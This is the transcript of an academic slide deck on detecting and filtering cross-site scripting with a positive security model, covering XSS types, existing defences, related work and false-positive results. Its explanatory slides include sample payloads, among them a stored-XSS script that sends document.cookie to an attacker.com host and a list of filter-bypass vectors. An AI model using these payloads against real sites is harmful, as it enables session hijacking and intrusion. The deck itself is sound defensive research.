Detecting and filtering XSS using Positive Security Logic

Detecting and filtering XSS using Positive Security Logic Ofer Rotberg David Movshovitz

Text Book Real World Web Application Architecture

“Today, over 70% of attacks come at the ‘Application Layer’ not the network or system layer.” - Gartner Group XSS is rated #1 among CVE (publicly reported vulnerabilities). Very simple to perform A plethora of freely available web applications. Much of the code is alpha or beta, written by inexperienced programmers. Every input has the potential to be an attack vector. In order to (really) fix must change code. http://xssed.com/archive [Source: Vulnerability Type Distributions in CVE Document version: 1.1 Date: May 22, 2007 (http://cwe.mitre.org/documents/vuln-trends/index.html)] XSS Background

Some more interesting results… Become an hacker ? Source: “WhiteHat Website Security Statistic Reports”, Dec 2008

The history repeats itself… Source: http://jeremiahgrossman.blogspot.com/2008/12/history-repeating-itself.html

3 Types of XSS • Reflected (Non-Persistent): Script embedded in the request is ‘reflected’ in the response • Stored (Persistent): Attacker’s input is stored and played back in later page views • DOM Based (Local): the problem exists within a page's (legitimate) client-side script itself.

Reflected XSS • Request • http://www.website.com/ index.php?name=Jim • Response <html> <body> Hello, Jim ... • Request • http://www.website.com/index.php?name=Jim<script>alert("XSS")</script> • Response <html> <body> Hello, Jim <script>alert("XSS")</script> ... • Browser – assumes server doesn’t send malicious content • Parse HTML – build DOM • Fetch resources and execute them.

Stored XSS • Trudy posts the following text on a message board: Great message! <script>var img=new Image(); img.src= "http://www.attacker.com/CookieStealer/WebForm1.aspx?s= "+document.cookie;</script> • When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy • MySpace.com virus.

DOM-Based XSS • First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml) • http://victim/promo?product_id=100&title=Last+Chance • http://victim/promo?product_id=100&title=Foo#<SCRIPT>alert('XSS') </SCRIPT> • <script> • var url = window.location.href; • var pos = url.indexOf("title=") + 6; • varlen = url.length; • vartitle_string = url.substring(pos,len); • document.write(title_string); • </script> DEMO

DOM XSS DEMO >!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <script language="JavaScript"> varvisitor_name = prompt("What is your name?“ ,"") </script> </head> <body> <script language="JavaScript"> document.write("Welcome " + visitor_name + " How are you?"); </script> </body> </html>

Current Approaches for (Web) Application Security Source-code analyzers (white box) Static – Run simple text-based searches for strings (e.g. strcpy). Dynamic construct all possible runtime functional call stacks. attempt to determine if a call (to strcpy, for example) can be reached by data received as an input from the user or the environment. Pro’s Operate on source code, thus can be used by developers. Integrate tightly into the development phase. Pinpoint the problems – where to fix. Con’s Developers must understand security. Language specific.

Current Approaches for (Web) Application Security (cont.) Web application scanners (black box) Fully automated or manual …see David’s slides. • Automated Login • Infinite web sites • How does the scanner know if logout has occurred ? • multi-page business processes utilizing HTML forms. • Web applications are constantly changing.

Current Approaches for (Web) Application Security (cont.) Web Application Firewalls (WAF) Often called “deep packet inspection firewalls”. Examine every request/response within the HTTP, SOAP, XML-RPC, and Web service layers. Focus on request Stored XSS is a problem. Filtering approaches: Misuse based (Negative model) novel attacks ? false positives - if the system configuration or environment changes false negative – if using negative model Large deviations from one web application to another (signature per application). Anomaly based Model “normal” traffic and find statistical deviations. False Positive rate. Unproven theory. Training set might include attacks.

HTTP Vs. Network anomaly detection The stateless nature of HTTP most existing attacks are only one request long. In network level attacks, an attacker might check if a vulnerability is likely to exist before attempting to exploit it. the non-stationary nature of web servers web site content changes rapidly. Changes in content imply changes in the HTTP requests HTTP requests are variable length Any learning algorithm that requires fixed-length input, such as a neural net, will not work. Training data for anomaly detection is unbalanced Many algorithms require similar amounts of normal and abnormal data These problems eliminate many algorithms that have been successful before

(Simple) Mitigation Techniques • Disable JS (…and also, Flash, ActiveX, Java Applets…) • Web 2.0 is based on AJAX. • Netscape SOP • Browser isn’t allowed to load or send JS if it doesn’t belong to the same domain. • …can be easily bypassed (<IMG src = http://attacker.com…) • What about mashup ? reuse of code ? external resources ?

(Simple) Mitigation Techniques (cont.) • Encode\Escape user input (in request/response) • encode all user-supplied HTML special characters, thereby preventing them from being interpreted as HTML. • But…many modern web application permit HTML input. • MS .NET Anti-XSS library , OWASP PHP Anti-XSS library.

(Simple) Mitigation Techniques (cont.) • Input validation • Positive security model. • check all input for length, type, syntax, and business rules before accepting the data to be displayed or stored. • Protect agains cookie stealing • Tie cookie to IP • HTTP-Only cookie - cookie is unavailable to JS.

The filtering problem • Remove all <script> tags from input • There are many different Ways to execute Scripts in an HTML Page (XSS cheatsheet) • <script src="http://bad.example.org/exploit.js"></script> • <img src="javascript:alert('XSS');"> • <iframe src='vbscript:alert("XSS")'> • <body onload="alert('XSS');"> • <link rel="stylesheet" ref="http://bad.example.org/exploit.css"> • <div id="mycode" expr="alert('hah!')" • <style="background:url('java\nscript:eval(document.all.mycode.expr)')"> • Input validation • there are many different ways to represent the same character in HTML . • Browsers tend to be “forgiving” XSS Cheat Sheet

The filtering problem (cont.)

Tricky Scripts • JS permits invoking code within code using eval() • eval("x=10;y=20;document.write(x*y)") • temp=eval("document.myForm." + fieldList[i]); • eval(xmlhttp.responseText); • JS writes new HTML elements with new JS • .innerHTML, document.write()

Related Work Client-side solutions Engin Kirda, Christopher Kruegel, Giovanni Vigna, and Nenad Jovanovic “Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks” (2006) A client-side web proxy that analyzes all internal and external links embedded in Web pages. Noxes will identify an unrecognized external link as an XSS attack. Noxes only focuses on the XSS attacks targeted on stealing credentials.

Related Work (cont.) Query anomaly analysis Christopher Krugel, G.Vigna, William Robertson, “A multimodal approach to the detection of web based attacks,”(2005) DFA Ingham, Somayaji, Burge and Forrest: “Learning DFA representations of HTTP for protecting web applications”(2006)

Related Work (cont.) Web response analysis Bisht and Venkatakrishnan “XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks” (July 2008).

XSS-Guard example

Related Work (cont.) Johns, Engelmann and Posegga, ”XSSDS: Server-side Detection of Cross-site Scripting Attacks” (Dec 2008). Reflected – Given a set of parameters P = {p1, p2, ..., pm} and a set of scripts S = {s1, s2, ..., sn} find all matches between P and S in which pi was used to define parts of sj. Stored – Static scripts – simple. Dynamic scripts Normalize constants (Strings, Numbers and RegEx) varying code blocks – variant  script

Related Work (cont.) Johns, Engelmann and Posegga, ”XSSDS: Server-side Detection of Cross-site Scripting Attacks” (Dec 2008). results

Proposed Model • Positive security logic. • All traffic is illegal unless known to be legal • HTML Response= collection of JavaScript nodes.

Model Benefits • Performance – “light” JS parsing. • Generic - targets all types of XSS • Even DOM-Based could be mitigated if web proxy is deployed on client side. • Fast convergence – short learning period • Number of JS nodes is bounded. • Most JS nodes appear in every page (“building blocks”). • JS nodes DB is transportable • Distributed learning. • Can detect some attacks even if JS didn’t run.

Implementation • Learn web sites: • Crawl web-site using websphinx (http://www.cs.cmu.edu/~rcm/websphinx/#about) • Produce static pages and dynamic pages using random fuzzer • JavaScript extraction. • Now –using HTMLParser (http://htmlparser.sourceforge.net/). • Future - Hook to Mozilla JS extraction engine ? • JavaScript code normalization. • Using Java RegEx

Challenges • Attack is browser specific. • Handle special instructions ( e.g.: eval() ). • Attacks against the model • Document.write(“…”); • Performance

False Positive Rate ≡ (# learned URL’s with new scripts)/(#URLs in detection phase) Test methodology Crawl web-site  create URL’s pool (~150 URL’s) Generate random query URL’s using fuzzer. Learn % of total URL’s (randomly picked) Detect % of total URL’s (randomly picked) Ignore “attacks” from unlearned URL’s Current Results - False Positive Rate

URL FP Rate w/o Normalization

Script FP Rate w/o Normalization

Current Results - False Negative Rate False Negative Rate ≡ (# Attacks Detected)/(#Attacks Injected) Test methodology Find a real vulnerable web-application (http://xssed.com) Create a pool of legitimate URLs using benign fuzzer. Create a pool of attack URLs using XSS cheat sheet payloads. Learn script DB. Detect attacks. 34

FN Results

Deployment Options

Further Work • Efficient implementation to increase performance • Code clone detection • Future Applications • Application JS profile • JS cache • Deployment options • ISP, Enterprise, Client. • Other fields: • JS worms propagation. • Mash-Up. • AJAX security.

Thank You !

Detecting and filtering XSS using Positive Security Logic

Detecting and filtering XSS using Positive Security Logic

Presentation Transcript

Detecting Adversaries Using Metafeatures

Using Predicate Logic

Detecting Logic Vulnerabilities in E-Commerce Applications

Analyzing and Detecting Network Security Vulnerability

XSS Vulnerabilities

Improving Spam Filtering by Detecting Gray Mail

Using Positive Language

Detecting Temporal Logic Predicates on Distributed Computations

ExchangeDefender Email Filtering, Security and Business Continuity

Detecting human activities using smartphones and maps

CROSS-SITE SCRIPTING AND XSS

Using Logo and Logic

Classifying and Filtering Spam Using Search Engines

XSS Attacks and Defenses

Detecting Logic Vulnerabilities in E-Commerce Applications

Using Common Logic

Detecting Test Security Problems Using Item Response Times and Patterns

Detecting merging and splitting using origin analysis

USING PREDICATE LOGIC

Filtering Structured Light Data Detecting the Second Bounce

Ch 4: Monitoring and Detecting Security Breaches

Detecting merging and splitting using origin analysis